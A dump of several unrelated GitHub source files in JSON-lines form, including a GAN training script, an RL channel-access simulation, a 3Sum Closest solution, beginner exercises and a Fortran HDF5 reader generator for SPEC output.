YouTube(\"http://youtube.com/watch?v=\" + vid_id)\n video = yt.streams.filter(only_audio=True).first()\n try: \n dl_file = video.download(output_path=path)\n print(dl_file)\n os.rename(dl_file, path + \"\\\\\" + song_name + \".mp3\")\n print(\"Downloaded \" + song_name)\n except:\n print(\"Could not download \" + song_name)\n os.remove(dl_file)\n print(\"\")\n webbrowser.open(path)\n \ndef main():\n INITIALIZE_VARIABLES()\n\n ACCESS_TOKEN = Authorization()\n Playlist_Data = Get_Playlist_Songs(ACCESS_TOKEN)\n Youtube(Playlist_Data)\n #Display_Playlist(Playlist_Data)\n\nif __name__ == \"__main__\":\n main()\n print(\"----------The End----------\")","repo_name":"rajmoham/Song-Downloader","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5014726937","text":"import wandb\nwandb.init(project='gan')\nimport torch, torch.optim as optim\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom net import Generator, Discriminator, real_loss, fake_loss\n\ndef datamaker(batch_size=1):\n train_dataset = datasets.MNIST(root='dataset', \n train=True, \n transform=transforms.ToTensor(),\n download=True)\n\n train_loader = torch.utils.data.DataLoader(train_dataset, \n batch_size=batch_size,\n num_workers=2)\n\n return train_loader\n\ndef train(batch_size=1, latent_size=100, learning_rate=2e-3, num_epochs=100):\n cuda = torch.cuda.is_available()\n device = 'cuda:0' if cuda else 'cpu'\n dataloader = datamaker(batch_size=batch_size)\n fixed_img = np.random.uniform(-1, 1, size=(batch_size, latent_size))\n fixed_img = torch.from_numpy(fixed_img).float()\n gen_imgs = []\n\n G = Generator(input_size=latent_size)\n D = Discriminator()\n if cuda:\n print('Using CUDA')\n fixed_img = fixed_img.cuda()\n G.cuda()\n D.cuda()\n \n\n\n g_optimizer = optim.Adam(G.parameters(), lr=learning_rate)\n d_optimizer = optim.Adam(D.parameters(), lr=learning_rate)\n\n wandb.watch(G)\n wandb.watch(D)\n for epoch in range(num_epochs):\n D.train()\n G.train()\n for idx, ( real_images, _ ) in enumerate(tqdm(dataloader)):\n if cuda:\n real_images = real_images.cuda()\n\n batch_size = 
real_images.size(0)\n real_images = real_images * 2 - 1\n\n g_loss_value = 0.0\n d_loss_value = 0.0\n for phase in ['discriminator', 'generator']:\n # TRAIN DISCRIMINATOR\n if phase == 'discriminator':\n # generate fake images from latent vector\n latent_vector = np.random.uniform(-1, 1, size=(batch_size, latent_size))\n latent_vector = torch.from_numpy(latent_vector).float()\n if cuda:\n latent_vector = latent_vector.cuda()\n fake_images = G(latent_vector)\n\n # compute discriminator loss on real images\n d_optimizer.zero_grad()\n d_real = D(real_images)\n d_real_loss = real_loss(d_real, smooth=True)\n\n # compute discriminator loss in fake images\n d_fake = D(fake_images)\n d_fake_loss = fake_loss(d_fake)\n\n # total loss, backprop, optimize and update weights\n d_loss = d_real_loss + d_fake_loss\n d_loss_value = d_loss.item()\n\n d_loss.backward()\n d_optimizer.step()\n\n # TRAIN GENERATOR\n if phase == 'generator':\n latent_vector = np.random.uniform(-1, 1, size=(batch_size, latent_size))\n latent_vector = torch.from_numpy(latent_vector).float()\n if cuda:\n latent_vector = latent_vector.cuda()\n fake_images = G(latent_vector)\n \n g_optimizer.zero_grad()\n d_fake = D(fake_images)\n g_loss = real_loss(d_fake)\n g_loss_value = g_loss.item()\n\n g_loss.backward()\n g_optimizer.step()\n\n if idx % 100 == 0: \n pass\n wandb.log({ 'G Loss': g_loss_value, 'D Loss': d_loss_value })\n wandb.log({ 'G Epoch Loss': g_loss_value, 'D Epoch Loss': d_loss_value }, step=epoch)\n \n # test performance\n G.eval()\n gen_img = G(fixed_img)\n gen_imgs.append(gen_img)\n \n # dump generated images\n with open('gen_imgs.pkl', 'wb') as f:\n pkl.dump(gen_imgs, f)\n\n\nif __name__ == '__main__':\n # data_iter = iter(train_loader)\n # images, labels = next(data_iter)\n # images = torch.squeeze(images, 0).permute(1,2,0)\n # images = torch.cat((images, images, images), dim=2)\n # print(images.size())\n # plt.imshow(images)\n # plt.show()\n\n train(batch_size=128)","repo_name":"blueyellowpink/gan","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14311708568","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ncalculate repeats similaritites for WDSP output file\nusage: python repeat_similarity.py wdsp_f\n\"\"\"\nimport sys\nfrom collections import OrderedDict\nfrom wdsp import Wdsp\n\n\ndef align(seq1, seq2):\n from Bio import pairwise2\n from Bio.SubsMat import MatrixInfo as matlist\n matrix = matlist.blosum62\n gap_open = -10 # usual value\n gap_extend = -0.5 # usual value\n\n alns = pairwise2.align.globalds(seq1, seq2, matrix, gap_open, gap_extend)\n\n seq1 = alns[0][0]\n seq2 = alns[0][1]\n identity = [1 for i, s in enumerate(seq1) if s == seq2[i]]\n identity = int(100 * len(identity) / len(seq1))\n\n return identity\n\n\ndef repeat_similarity(repeats):\n lens = len(repeats)\n sims = []\n for i in xrange(lens):\n sim_i = []\n for j in xrange(lens):\n if j < i:\n sim_i.append(sims[j][i])\n elif j >= i:\n sim_i.append(align(repeats[i], repeats[j]))\n sims.append(sim_i)\n average = (sum([sum(i) for i in sims]) - lens * 100) / (lens * (lens - 1))\n return average, sims\n\n\ndef main():\n with open(sys.argv[-1]) as o_f:\n w = Wdsp(o_f)\n sims = OrderedDict()\n for pro, repeats in w.repeats.iteritems():\n sims[pro] = repeat_similarity(repeats)\n\n with open('sims.txt', 'w') as w_f:\n for k, v in sims.iteritems():\n print >> w_f, '{0:<20}{1:<}'.format(k, 
v[0])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lituan/Topface","sub_path":"repeat_similarity.py","file_name":"repeat_similarity.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42272391708","text":"from CSMA_agent import CsmaAgent\nimport gym\nfrom custom_env import threshold_env\nfrom DQN import KerasDQN\nimport numpy as np\nimport csv\n\n# --------------------> Parameters <--------------------\nsave = True # Save data to CSV\nsave_data_path = \"./data/\"\nn_iterations = 3 # How many full simulations to run\nfeature_histories = 1\n# ------------------------------------------------------------\n\n# --------------------- Create Env ---------------------\nn_agents = 4 \nthreshold = 1 \nn_steps = 1e4\ntransmit_and_sense = False\n# With buffer intervals\nbuffer_intervals = [2, 5, 8, 10] * 4\nenv = threshold_env(n_agents, threshold, n_steps, \n transmit_and_sense=transmit_and_sense,\n buffer_intervals=buffer_intervals)\n\"\"\"\nenv = threshold_env(n_agents, threshold, n_steps, \n transmit_and_sense=transmit_and_sense)\n\"\"\"\n# -----------------------------------------------------\n\n\ndef state_to_observations(state):\n \"\"\"\n Input:\n - obs [list or np.array]: Concatenated list of all observations\n\n Returns:\n - list of lists of observations for each agent\n \"\"\"\n n_obs_per_agent = len(state) // n_agents\n #print(\"n_obs_per_agent\", n_obs_per_agent)\n agent_obs = [np.array(state[i * n_obs_per_agent: (i + 1) * n_obs_per_agent]).reshape(1, -1) for i in range(n_agents)]\n\n return agent_obs\n\n# ---------------------- Training Loop --------------------\ncurrIt = 0\nwhile True:\n # --------------------- Create Agents ---------------------\n n_inputs = 4 * feature_histories \n n_actions = 5 \n # DQN\n \"\"\"\n agents = [KerasDQN(n_inputs, n_actions,\n hidden_layer_one_dims=128,\n hidden_layer_two_dims=256,\n batch_size=64,\n epsilon_min=0.05) for _ in range(n_agents)]\n \"\"\"\n # CSMA Agents\n #agents = [CsmaAgent(wait_for_idle=True) for _ in range(n_agents)]\n #agents = [CsmaAgent(wait_for_idle=True, back_off_strategy=\"fixed\", p=n_actions) for _ in range(n_agents)]\n #agents = [CsmaAgent(wait_for_idle=False) for _ in range(n_agents)] # not used in paper\n agents = [CsmaAgent(wait_for_idle=False, back_off_strategy=\"fixed\", p=n_actions) for _ in range(n_agents)]\n # ------------------------------------------------------\n\n stepIdx = 0\n rewards = []\n action_list = []\n states = []\n scores = [[] for _ in range(n_agents)] # is this the same as rewards?\n rewards = []\n\n state = env.reset() # If I refactor state, make this work\n state = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n next_state = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n\n # For multi-step actions\n state_at_action = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n future_actions = [[] for _ in range(n_agents)]\n action_duration = [0 for _ in range(n_agents)]\n reward_over_actions = [[] for _ in range(n_agents)]\n actions = [0 for _ in range(n_agents)] # Action selected by the agent (could be multi-step)\n actions_to_take = [0 for _ in range(n_agents)] # do/don't transmit on this step. 
In {0, 1}\n \n while True:\n # Get Actions ------------------------------\n for i in range(n_agents):\n # if buffer is 0 don't use RL, also don't save if no RL was used\n if state[i][0][-1] == 0:\n #actions.append(-1) # Original\n actions[i] = -1\n future_actions[i] = [-1]\n\n # If the action_duration is 0, get a new action,\n elif action_duration[i] == 0: # make sure this can't be negative\n # Get action, save state, set future actions, and action_duration\n agent_action = agents[i].choose_action(state[i])\n state_at_action[i] = state[i]\n\n if agent_action == 0:\n future_actions[i] = [0]\n elif agent_action == 1:\n future_actions[i] = [1]\n elif agent_action == 2:\n future_actions[i] = [0, 1]\n elif agent_action == 3:\n future_actions[i] = [0, 0, 1]\n elif agent_action == 4:\n future_actions[i] = [0, 0, 0, 1]\n elif agent_action == 5:\n future_actions[i] = [0, 0, 0, 0, 1]\n elif agent_action == 6:\n future_actions[i] = [0, 0, 0, 0, 0, 1]\n elif agent_action == 7:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 1]\n elif agent_action == 8:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 1]\n elif agent_action == 9:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 0, 1]\n elif agent_action == 10:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n else:\n raise ValueError\n\n \"\"\"\n # Idea to try for 10 agents\n if agent_action == 0:\n future_actions[i] = [0]\n elif agent_action == 1:\n future_actions[i] = [1]\n elif agent_action == 2:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n \"\"\"\n\n # Update actions if a new decision is made\n actions[i] = agent_action\n\n action_duration[i] = len(future_actions[i])\n\n # Set action to take by popping future action\n actions_to_take[i] = future_actions[i].pop(0)\n # -------------------------------------------------------------------\n\n # Take an environment step\n new_state_info, reward, done, info = env.step(actions_to_take)\n next_state = state_to_observations(new_state_info)\n\n # Decrement all action durations\n action_duration = [duration - 1 for duration in action_duration]\n\n # Remember reward and transitions\n for i in range(n_agents):\n agent_action = actions[i]\n\n # Check if RL was not used\n if agent_action == -1: # RL agent not invoked. 
Do not save transition to memory\n continue\n\n # Add reward to reward_over_actions\n agent_reward = reward[i] # For now, reward is the same for all agents\n reward_over_actions[i].append(agent_reward)\n\n # Save transitions only when action_duration == 0\n if action_duration[i] == 0:\n agent_state = state_at_action[i]\n agent_next_state = next_state[i]\n\n # Average reward\n agent_average_reward_over_action = float(np.mean(reward_over_actions[i]))\n # Save transition with the state at the time of the action decision and\n # the average reward over the course of the action\n agents[i].remember(agent_state, agent_action, agent_average_reward_over_action,\n agent_next_state, done)\n\n agents[i].learn() # Could be moved outside of the \"if\" block\n\n # Clear reward_over_actions\n reward_over_actions = [[] for _ in range(n_agents)]\n\n #print(\"actions\", actions)\n\n for i in range(n_agents):\n scores[i].append(reward[i])\n\n rewards.append(reward.copy())\n action_list.append(actions.copy())\n states.append(state)\n\n state = next_state\n\n stepIdx += 1\n if stepIdx % 100 == 0:\n print(\"Step: \", stepIdx)\n for i in range(n_agents):\n print(\"mean (last 50)\", np.mean(scores[i][-50:]))\n if i == (n_agents - 1):\n print()\n\n if done:\n # Record data in CSV\n if save == True:\n data = [list(reward) + list(action) + list(np.array(state).flatten()) for reward, action, state in zip(rewards, action_list, states)]\n with open(save_data_path + \"data\" + str(currIt) + \".csv\", \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(data)\n break\n\n currIt += 1\n if currIt == n_iterations:\n break\n","repo_name":"Farquhar13/RL_Transmission_Control","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"73967604729","text":"import pickle\nnumlst=list(range(1,51))\nprint(numlst)\n'''\nfor i in range(1,51):\n f=open('{0}주차.txt'.format(i),'w',encoding='utf8')\n f.write('- {0} 주차 주간보고 -\\n'.format(i))\n f.write('부서 :\\n이름 :\\n업무 요악 :')\nf.close()\n\nfor i in range(1,51):\n f=open('{0}주차.txt'.format(i),'r',encoding='utf8')\n print(f.read())\nf.close()\n\nfor i in range(1,51):\n f=open(\"{0}주차.pickle\".format(i),\"wb\")\n content='- {0} 주차 주간보고 -\\n부서 :\\n업무 :\\n업무 요약 :'.format(i)\n pickle.dump(content,f)\n f.close()\n\nfor i in range(1,51):\n f=open(\"{0}주차.pickle\".format(i),\"rb\")\n content = pickle.load(f)\n print(content)\n f.close()\n\nfor i in range(1,51):\n with open(\"{0}주차.txt\".format(i),'r',encoding='utf8') as f:\n print(f.read())\n'''\n\nwith open(\"{n}주차.txt\".format(n=numlst[:50]),'r',encoding='utf8') as f:\n print(f.read())\n","repo_name":"beans3142/study_language","sub_path":"나도코딩 파이썬/6H코딩/퀴즈/퀴즈6/퀴즈6.py","file_name":"퀴즈6.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14990791045","text":"# 16. 3Sum Closest\n# 🟠 Medium\n#\n# https://leetcode.com/problems/3sum-closest/\n#\n# Tags: Array - Two Pointers - Sorting\n\nimport timeit\nfrom typing import List\n\n\n# Sort the input, fix one element starting from the left and use\n# two pointers encircling the remaining window to calculate possible\n# sums. 
When the current sum is bigger than target, shrink the window\n# from the right, when smaller, shrink it from the left, this allows us\n# to find the best 3sum with each element in O(n).\n#\n# Time complexity: O(n^2) - For each element, we find the best 3sum that\n# contains it in linear time.\n# Space complexity: O(1) - We keep one sum and 3 pointers in memory.\n#\n# Runtime: 7216 ms, faster than 40.63%\n# Memory Usage: 14 MB, less than 88.54%\nclass LoopAndTwoPointers:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n # If we only have 3 elements, return the input.\n if len(nums) < 4:\n return sum(nums)\n # Sort the input to be able to use a two pointer approach.\n nums.sort()\n # We are guaranteed to have at least 3 elements.\n closest = sum(nums[:3])\n # The outer loop iterates over all the values except the last\n # two, these are covered by the left and right pointer.\n for idx in range(len(nums) - 2):\n # Use a left and right pointer to calculate possible 3 sums.\n # Initialize the pointers to the biggest possible window.\n left, right = idx + 1, len(nums) - 1\n # Check sums while we haven't checked them all.\n while left < right:\n current = nums[idx] + nums[right] + nums[left]\n # If the current sum is greater than the target, find a\n # smaller sum by moving left the right pointer.\n if current > target:\n right -= 1\n # If the current sum is less than the target, find a\n # larger sum by moving right the left pointer.\n elif current < target:\n left += 1\n # If the target equals the sum, return the values, this\n # is the only match.\n else:\n return current\n # Check all possible sums against the best.\n if abs(current - target) < abs(closest - target):\n closest = current\n\n return closest\n\n\n# We can extend the previous solution to come up with a generic\n# solution that finds the sum of k elements that comes closer to target.\n#\n# Time complexity: O(n^2) - For each element, we find the best 3sum that\n# contains it in linear time.\n# Space complexity: O(n) - We keep the reversed input and use list\n# comprehension to calculate the result, linear space.\nclass KSum:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n nums.sort()\n return self.kSumClosest(nums, target, 3)\n\n def kSumClosest(self, nums: List[int], target: int, k: int) -> int:\n n = len(nums)\n if k == n:\n return sum(nums[:k])\n\n current = sum(nums[:k])\n if current >= target:\n return current\n\n current = sum(nums[-k:])\n if current <= target:\n return current\n\n if k == 1:\n return min(\n [(x, abs(target - x)) for x in nums],\n key=lambda tuple: tuple[1],\n )[0]\n\n closest = sum(nums[:k])\n for i in range(n - k + 1):\n if i > 0 and nums[i - 1] == nums[i]:\n continue\n\n current = (\n self.kSumClosest(nums[i + 1 :], target - nums[i], k - 1)\n + nums[i]\n )\n if abs(target - current) < abs(target - closest):\n if current != target:\n closest = current\n else:\n return target\n\n return closest\n\n\ndef test():\n executors = [\n LoopAndTwoPointers,\n KSum,\n ]\n tests = [\n [[-1, 2, 1, -4], 1, 2],\n [[0, 0, 0], 1, 0],\n [[1, 1, 1, 1], 0, 3],\n ]\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for n, t in enumerate(tests):\n sol = executor()\n result = sol.threeSumClosest(t[0], t[1])\n exp = t[2]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for \"\n + f\"test {n} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = 
cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"leetcode/3sum-closest.py","file_name":"3sum-closest.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"45794013324","text":"\"\"\"\nDesenvolva um programa que leia seis números inteiros e mostre a soma apenas\ndaqueles que forem pares. Se o valor digitado for ímpar, descondidere-o\n\"\"\"\nsoma = 0\ncont = 0\nfor n in range(1, 7):\n num = int(input(f'Digite o {n}º número inteiro: '))\n if num % 2 == 0:\n soma += num\n cont += 1\nprint(f'Você informou {cont} números PARES e a soma destes é igual a {soma}.')\n","repo_name":"judigunkel/Exercicios-Python","sub_path":"Mundo 2/ex050.py","file_name":"ex050.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16134966407","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 15:17:47 2019\n\n@author: Jonathan Schilling (jonathan.schilling@ipp.mpg.de)\n\"\"\"\n\n#%% prepare for code generation\n\ndef indented(tabs, lines, indentationChar=\"\\t\"):\n indentation = \"\"\n for i in range(tabs):\n indentation += indentationChar\n indented = ''\n if '\\n' in lines.strip():\n for line in lines.split('\\n'):\n if line != '':\n indented += indentation+line+'\\n'\n else:\n indented = indentation+lines#.strip()\n return indented\n\ndef indent(tabs, lines, indentationChar=\"\\t\"):\n return tabs+1, indented(tabs, lines, indentationChar)\n\ndef unindent(tabs, lines, indentationChar=\"\\t\"):\n return tabs-1, indented(tabs, lines, indentationChar)\n\n\n#%% document who created the reading routines when on which machine\n\nfrom datetime import datetime\nimport getpass\nimport platform\n\n# dd/mm/YY H:M:S in UTC\nnow_string = datetime.utcnow().strftime('%d/%m/%Y %H:%M:%S UTC')\nusername = getpass.getuser()\nhostname = platform.node()\n\ncreation_tag = 'auto-created by a user called \\''+username+'\\' on a machine called \\''+hostname+'\\' at '+now_string\n\n#%% generate Fortran type declarations\nfrom Hdf5File import Group, Dataset, Datatype\n\n# datatype in Fortran from specification file\ndef fortran_dtype(dtype):\n if dtype=='int':\n return 'INTEGER'\n elif dtype=='double':\n return 'DOUBLE PRECISION'\n elif dtype=='boolean':\n return 'LOGICAL'\n else:\n return 'TYPE('+dtype.upper()+')'\n\n# generate custom compound datatype declaration in Fortran\ndef fortran_genType(name, members):\n ret = 'TYPE '+name+'\\n'\n for member in members:\n if type(member) == Group or type(member) == Datatype:\n ret += ' TYPE('+member.name+')'\n else:\n ret += ' '+fortran_dtype(member.dtype)\n if member.rank>0:\n ret += ', ALLOCATABLE'\n ret += ' :: '+member.name\n if type(member) != Group and member.rank>0:\n ret += '('\n for i in range(member.rank):\n if i>0:\n ret += ',:'\n else:\n ret += ':'\n ret += ')'\n ret += '\\n'\n ret += 'END TYPE '+name\n return ret\n\n# initial code of loading routine\ndef fortran_startLoader(f):\n f.write(\"\"\"subroutine loadSpec(s, filename, ierr)\n use hdf5\n implicit none\n type(SpecOutput), intent(inout) :: s ! target datastructure\n character(len=*), intent(in) :: filename ! filename to load\n integer, intent(out), optional :: ierr ! error flag; .eq.0 if ok\n integer :: hdfier ! error flag for HDF5 API calls\n integer(hid_t) :: file_id ! 
identifier for current file\n integer(hid_t) :: dset_id ! temporary dataset id\n integer(hid_t) :: dataspace ! dataspace used to query dataset size\n integer(hsize_t) :: dims_1(1) ! current dimensions of rank-1 dataset\n integer(hsize_t) :: dims_2(2) ! current dimensions of rank-2 dataset\n integer(hsize_t) :: dims_3(3) ! current dimensions of rank-3 dataset\n integer(hsize_t) :: max_dims_1(1) ! maximum dimensions of rank-1 dataset\n integer(hsize_t) :: max_dims_2(2) ! maximum dimensions of rank-2 dataset\n integer(hsize_t) :: max_dims_3(3) ! maximum dimensions of rank-3 dataset\n integer :: logical_tmp ! temporary integer used to read logicals\n \n call h5open_f(hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening HDF5 library\" ; goto 9999 ; endif\n\n call h5fopen_f(filename, H5F_ACC_RDONLY_F, file_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening HDF5 file '\",filename,\"'\" ; goto 9998 ; endif\n\"\"\")\n\n# finalizing code of loading routine\ndef fortran_endLoader(f):\n f.write(\"\"\"\n9998 continue\n \n call h5fclose_f(file_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing HDF5 file '\",filename,\"'\" ; ierr = hdfier ; endif\n\n9999 continue\n\n call h5close_f(hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing HDF5 library\" ; ierr = hdfier ; endif \n \nend subroutine loadSpec\n\"\"\")\n\n# write demo code\ndef fortran_demoLoader(f):\n f.write(\"\"\"\nprogram test_read_spec\n use read_spec\n implicit none\n type(SpecOutput) :: s\n character(*), parameter :: filename = \"/home/jonathan/Uni/04_PhD/00_programs/SPEC/SPEC/InputFiles/TestCases/G3V02L1Fi.001.h5\"\n \n write(*,*) \"reading '\",filename,\"'...\"\n call loadSpec(s, filename)\n write(*,*) \"done\"\n \n write(*,\"(A,F4.2)\") \"SPEC version: \", s%version\n write(*,\"(A,99I2)\") \"Lrad:\", s%input%physics%Lrad\n \n call freeSpec(s)\nend program test_read_spec\n\"\"\")\n\n# read a scalar (int or double) from HDF5 variable srcPath into the source code variable targetPath\ndef fortran_loadItem(f, item):\n \n srcName = item.getFullName()\n \n targetName = \"s\"+srcName.replace(\"/\",\"%\")\n if item.rank>0:\n targetName += \"(\"\n if item.indexMapping is not None:\n for dim,idxRange in enumerate(item.indexMapping):\n if dim==0:\n targetName += idxRange\n else:\n targetName += \", \"+idxRange\n else:\n for dim in range(item.rank):\n if dim==0:\n targetName += \"1:dims_\"+str(item.rank)+\"(1)\"\n else:\n targetName += \", 1:dims_\"+str(item.rank)+\"(\"+str(dim+1)+\")\"\n targetName += \")\"\n \n #print(\"read {} into {}\".format(srcName, targetName))\n \n # translate dtype into HDF5 type\n h5type='ERROR'\n if item.dtype=='double':\n h5type='H5T_NATIVE_DOUBLE'\n elif item.dtype=='int' or item.dtype=='boolean':\n h5type='H5T_NATIVE_INTEGER'\n else:\n h5type='TYPE('+item.dtype.upper()+')'\n \n \n \n \n if item.rank==0:\n if (item.dtype=='boolean'):\n fmt=\"\"\"\n! {srcName} --> {targetName}; rank={rank}; h5type={h5type}\n call h5dopen_f(file_id, \"{srcName}\", dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dread_f(dset_id, {h5type}, logical_tmp, int((/1/), HSIZE_T), hdfier)\n {targetName} = merge(.TRUE., .FALSE., logical_tmp.ne.0)\n if (hdfier.ne.0) then ; write(*,*) \"error reading dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dclose_f(dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataset '{srcName}'\" ; goto 9998 ; endif\n\"\"\"\n else:\n fmt=\"\"\"\n! 
{srcName} --> {targetName}; rank={rank}; h5type={h5type}\n call h5dopen_f(file_id, \"{srcName}\", dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dread_f(dset_id, {h5type}, {targetName}, int((/1/), HSIZE_T), hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error reading dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dclose_f(dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataset '{srcName}'\" ; goto 9998 ; endif\n\"\"\"\n else:\n if (item.dtype=='boolean'):\n print(\"ERROR: cannot generate reader for logical array '\"+srcName+\"' yet!\")\n fmt=\"\"\"\n! {srcName} --> {targetName}; rank={rank}\n call h5dopen_f(file_id, \"{srcName}\", dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening dataset '{srcName}'\" ; goto 9998 ; endif\n \n ! open dataspace to get current state of dataset\n call h5dget_space_f(dset_id, dataspace, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error getting dataspace for dataset '{srcName}'\" ; goto 9998 ; endif\n \n ! get current size of dataset\n call h5sget_simple_extent_dims_f(dataspace, dims_{rank}, max_dims_{rank}, hdfier)\n if (hdfier.ne.{rank}) then ; write(*,*) \"unexpected rank of dataset '{srcName}': \",hdfier,\" .ne. {rank}\" ; goto 9998 ; endif\n\n ! close dataspace after it has been used to query the size of the variable\n call h5sclose_f(dataspace, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataspace for dataset '{srcName}'\" ; goto 9998 ; endif\n \n allocate({targetName})\n \n call h5dread_f(dset_id, {h5type}, {targetName}, dims_{rank}, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error reading dataset '{srcName}'\" ; goto 9998 ; endif\n \n call h5dclose_f(dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataset '{srcName}'\" ; goto 9998 ; endif\n\"\"\"\n f.write(fmt.format(srcName=srcName, targetName=targetName, h5type=h5type, rank=item.rank))\n \n# initial code of loading routine\ndef fortran_startFree(f):\n f.write(\"\"\"subroutine freeSpec(s)\n implicit none\n type(SpecOutput), intent(inout) :: s ! datastructure to free\n\"\"\")\n\n# finalizing code of loading routine\ndef fortran_endFree(f):\n f.write(\"\"\"end subroutine freeSpec\n\"\"\")\n\n# free an allocated item of rank .ge. 1\ndef fortran_freeItem(f, item):\n \n srcName = item.getFullName()\n targetName = \"s\"+srcName.replace(\"/\",\"%\")\n \n if (item.rank > 0):\n print(\"free {}\".format(targetName))\n f.write(\" deallocate(\"+targetName+\")\\n\")\n \n\n#%% actually generate Fortran module for reading SPEC output files\ndef genFortranReader(outdir, moduleName, s):\n \n # we need to reverse the definition order so that types which are used inside other types\n # are already defined when used\n reverse_rootStack = []\n \n rootStack = []\n rootStack.append(s.rootGroup)\n while len(rootStack)>0:\n currentItem = rootStack[-1]\n rootStack = rootStack[:-1]\n \n if currentItem is not s.rootGroup:\n reverse_rootStack.append(currentItem)\n if type(currentItem)==Group:\n for item in currentItem.items:\n rootStack.append(item)\n \n \n fortranFilename = outdir+moduleName+\".f90\"\n print(\"creating Fortran reading module into '\"+fortranFilename+\"'\")\n \n # begin code for root group (== enclosing class)\n f=open(fortranFilename, \"w\")\n \n f.write(\"\"\"! AUTO-GENERATED; DO NOT COMMIT CHANGES TO THIS FILE !\n! 
\"\"\"+creation_tag+\"\"\"\nmodule \"\"\"+moduleName+\"\\n\")\n \n # custom datatypes come first\n for dtype in s.getDatatypes():\n f.write(fortran_genType(dtype.name, dtype.items)+'\\n')\n \n # we need to reverse the definition order so that types which are used inside other types\n # are already defined when used\n reverse_groupStack = []\n \n groupStack = []\n groupStack.append(s.rootGroup)\n while len(groupStack)>0:\n currentGroup = groupStack[-1]\n groupStack = groupStack[:-1]\n \n if type(currentGroup)==Group:\n reverse_groupStack.append(currentGroup)\n \n for item in currentGroup.items:\n if type(item)==Group:\n groupStack.append(item)\n \n # iterate in reverse order over the discovered variables to generate type definitions in correct order\n for currentGroup in reverse_groupStack[::-1]:\n f.write(fortran_genType(currentGroup.name, currentGroup.items)+'\\n')\n \n f.write(\"contains\\n\")\n \n # initial code of loading routine\n fortran_startLoader(f)\n \n # loop over all variables again and put the loader code for each of them one after another\n for currentGroup in reverse_groupStack[::-1]:\n for item in currentGroup.items:\n if type(item)==Dataset:\n fortran_loadItem(f, item)\n \n # finalizing code of loading routine\n fortran_endLoader(f)\n \n # write the freeSpec subroutine to free the memory it occupied\n fortran_startFree(f)\n \n for currentGroup in reverse_groupStack[::-1]:\n for item in currentGroup.items:\n if type(item)==Dataset:\n fortran_freeItem(f, item)\n \n # finalizing code of freeing routine\n fortran_endFree(f)\n \n f.write(\"end module read_spec\\n\")\n\n # write demo code\n #fortran_demoLoader(f)\n\n f.close()","repo_name":"PrincetonUniversity/SPEC","sub_path":"Utilities/pythontools/misc/genFortran.py","file_name":"genFortran.py","file_ext":"py","file_size_in_byte":12045,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"74259599289","text":"import random\nfrom typing import Any\n\nimport folium\n\nfrom models import LocationInDb\nfrom config import app\n\n\nCOLORS = [\n \"red\",\n \"blue\",\n \"green\",\n \"purple\",\n \"orange\",\n \"darkred\",\n \"lightred\",\n \"beige\",\n 